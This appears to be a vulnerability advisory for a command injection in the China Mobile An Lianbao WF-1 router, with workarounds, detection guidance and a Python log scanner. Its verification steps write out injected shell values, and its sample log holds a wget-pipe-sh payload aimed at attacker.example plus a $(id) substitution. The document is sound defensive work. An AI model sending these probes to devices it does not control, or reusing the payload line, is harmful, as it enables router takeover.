CVE-2021-25812
📋 TL;DR
This CVE describes a command injection vulnerability in China Mobile An Lianbao WF-1 routers running firmware version 1.01. An attacker who can reach the web management interface can execute arbitrary operating-system commands on the device by sending a crafted POST request to the /api/ZRQos/set_online_client endpoint with shell metacharacters in the 'ip' parameter; the value is evidently handed to a shell without being validated as an IP address.
💻 Affected Systems
- China Mobile An Lianbao WF-1 router, firmware version 1.01
📦 What is this software?
The An Lianbao WF-1 is a router sold by China Mobile (product listing: https://www.zhipinmall.com/prodetail?id=1266#skuId=3020). Firmware releases and security notices for China Mobile's devices are published through the vendor's IoT portal at http://iot.10086.cn/?l=en-us. The vulnerable firmware is version 1.01.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the router allowing attackers to intercept all network traffic, install persistent backdoors, pivot to internal networks, and potentially brick the device.
Likely Case
Attackers gain remote code execution on the router, enabling them to modify network configurations, intercept sensitive data, and use the device as a foothold for further attacks.
If Mitigated
If the management interface is reachable only from trusted administrative hosts (firewall rules, no WAN exposure), the vulnerable endpoint cannot be reached from elsewhere and the bug is not exploitable remotely. Segmenting the router from critical systems limits lateral movement after a compromise, but it does not protect traffic that still transits the router, so a compromised unit must be treated as an untrusted network path.
🎯 Exploit Status
A public write-up on GitHub (see References) documents the injection request: a single POST to /api/ZRQos/set_online_client with shell metacharacters in the 'ip' parameter, with no authentication required. No memory corruption or special tooling is involved, so any client that can reach the management interface can reproduce it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: http://iot.10086.cn/?l=en-us
Restart Required: No
Instructions:
No official patch is currently available. Monitor the vendor's IoT security portal for updates and firmware releases.
🔧 Temporary Workarounds
Network Access Control (Linux)
Restrict access to the router's management interface so that only trusted administrative hosts can reach it. The iptables rules below apply on a Linux host that filters traffic to that interface: the router itself if its firmware gives you a shell, or a Linux gateway placed in front of it. Most consumer firmware offers no shell; in that case use the router's own settings to disable remote (WAN) management and to limit LAN-side administration. Replace TRUSTED_IP with the administrator's address and adjust the ports if the interface listens elsewhere. Because -A appends, the ACCEPT rules must be added before the DROP rules, as shown:
iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
Disable Vulnerable Endpoint (all platforms)
If the management interface is published through a reverse proxy or web application firewall, block requests to /api/ZRQos/set_online_client there (for example, a rule that returns 403 for that exact path). Expect the management UI feature that uses this endpoint to stop working while the block is in place. This does not help if clients reach the router directly, so combine it with the access restriction above.
🧯 If You Can't Patch
- Replace vulnerable routers with secure alternatives from different vendors
- Implement network segmentation to isolate the router from critical internal systems
🔍 How to Verify
Check if Vulnerable:
Only test devices you own or are authorised to assess. Send a POST request to http://[router_ip]/api/ZRQos/set_online_client with the 'ip' parameter set to an otherwise valid address followed by an injected harmless command (e.g. '192.168.1.2; ls;'). If command output appears in the response, the device is vulnerable. Because output may not be reflected, also try a time-based probe such as '192.168.1.2; sleep 5;' and compare the response time with that of an unmodified request; a consistent five-second delay indicates the command executed. Avoid commands that change state on the device.
Check Version:
Read the firmware version from the router's web interface (system or status page). nmap can confirm which ports serve the management interface and fingerprint the HTTP server, but service detection does not reliably report the firmware version: nmap -sV -p 80,443 [router_ip]
Verify Fix Applied:
Repeat the probe above from a host that should no longer be permitted: the connection should be dropped, or the request rejected (e.g. HTTP 403 from a proxy block). Keep in mind that the workarounds restrict who can reach the endpoint; they do not remove the injection itself, so a permitted host can still trigger it until fixed firmware is installed.
📡 Detection & Monitoring
Log Indicators:
- POST requests to /api/ZRQos/set_online_client whose 'ip' parameter contains shell metacharacters (; & | ` $ ( )) or anything other than a plain IPv4 address; note that ordinary access logs do not record POST bodies, so this is only visible where a proxy or WAF in front of the interface logs request bodies
- Router system logs (where they can be exported) showing unexpected processes, configuration changes or outbound downloads shortly after a request to the endpoint
- Failed authentication attempts followed by API calls
Network Indicators:
- Unusual outbound connections from router to external IPs
- Traffic patterns indicating command and control communication
- POST requests to router management interface from unexpected sources
SIEM Query (pseudo-syntax; adapt field names and the regex operator to your SIEM, and remember the 'ip' value is only present if request bodies are logged):
source="router_logs" AND url="/api/ZRQos/set_online_client" AND param="ip" AND value MATCHES "[;&|`$()]"
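Turning the indicators above into a runnable check: the Python below is an added example (not code from this page or from China Mobile) that scans request records for POSTs to /api/ZRQos/set_online_client whose 'ip' value is not a plain IPv4 address or contains shell metacharacters. The log lines are constructed samples in an assumed one-record-per-line "METHOD PATH BODY" format, such as a reverse proxy that logs request bodies might emit; real routers do not log POST bodies, so the format is an assumption. It also shows two pitfalls a naive SIEM rule misses: percent-encoded payloads must be decoded before matching, and splitting the body on ';' as well as '&' (as older urllib.parse.parse_qs did) would hide exactly the separator an injection uses.

```python
"""Added example: flag command-injection attempts against the WF-1
/api/ZRQos/set_online_client endpoint in request logs.

The record format (METHOD PATH BODY per line) and every sample line are
constructed for this example; nothing here is captured from a real device.
"""
import ipaddress
import re
from urllib.parse import unquote_plus

ENDPOINT = "/api/ZRQos/set_online_client"
# Characters that can start a new shell command or a substitution; none of
# them can appear in a legitimate IPv4 address.
SHELL_META = re.compile(r"[;&|`$(){}<>\\'\"\n]")

# Constructed sample records (not real traffic). Lines 2-4 carry payloads:
# a plain ';' chain, a percent-encoded chain, and a $() substitution.
SAMPLE_LOG = """\
POST /api/ZRQos/set_online_client ip=192.168.1.23&mac=aa:bb:cc:dd:ee:ff
POST /api/ZRQos/set_online_client ip=192.168.1.23;ls;&mac=aa:bb:cc:dd:ee:ff
POST /api/ZRQos/set_online_client ip=192.168.1.23%3Bwget+http%3A%2F%2Fattacker.example%2Fx%7Csh&mac=00:11:22:33:44:55
POST /api/ZRQos/set_online_client ip=$(id)&mac=00:11:22:33:44:55
POST /api/ZRQos/set_online_client ip=10.0.0.7&mac=00:11:22:33:44:55
GET /api/status -
"""


def form_params(body):
    """Split an application/x-www-form-urlencoded body on '&' only.

    Older urllib.parse.parse_qs also split on ';', which would turn
    'ip=192.168.1.23;ls;' into a harmless-looking ip=192.168.1.23 and
    hide the injected command, so the split is done by hand here.
    """
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def is_ipv4(value):
    """Allow-list check: True only for a syntactically valid IPv4 address."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def analyze_line(line):
    """Return None for a benign record, else (ip_value, reasons)."""
    parts = line.strip().split(" ", 2)
    if len(parts) != 3:
        return None
    method, path, body = parts
    if method != "POST" or path != ENDPOINT:
        return None
    for raw in form_params(body).get("ip", []):
        # form_params decoded once; decode again so a double-encoded
        # payload (%253B -> %3B -> ';') is normalised before matching.
        value = unquote_plus(raw)
        reasons = []
        if SHELL_META.search(value):
            reasons.append("shell metacharacter")
        if not is_ipv4(value):
            reasons.append("not a valid IPv4 address")
        if reasons:
            return value, reasons
    return None


def scan(log_text):
    """Run analyze_line over every record; return [(line_no, ip_value, reasons)]."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        result = analyze_line(line)
        if result is not None:
            hits.append((number, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for number, value, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: ip={value!r} -> {', '.join(reasons)}")
```

The allow-list check (is the value a valid IPv4 address?) is the more robust of the two tests: a blacklist of metacharacters can be bypassed by encodings or characters it does not list, whereas anything that is not an address has no legitimate reason to be in this parameter. Running the script against the constructed sample flags lines 2, 3 and 4 and leaves the two well-formed requests and the GET alone.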
🔗 References
- http://iot.10086.cn/?l=en-us
- https://github.com/pokerfacett/MY_REQUEST/blob/master/China%20Mobile%20An%20Lianbao%20WF-1%20router%20Command%20Injection.md
- https://www.zhipinmall.com/prodetail?id=1266#skuId=3020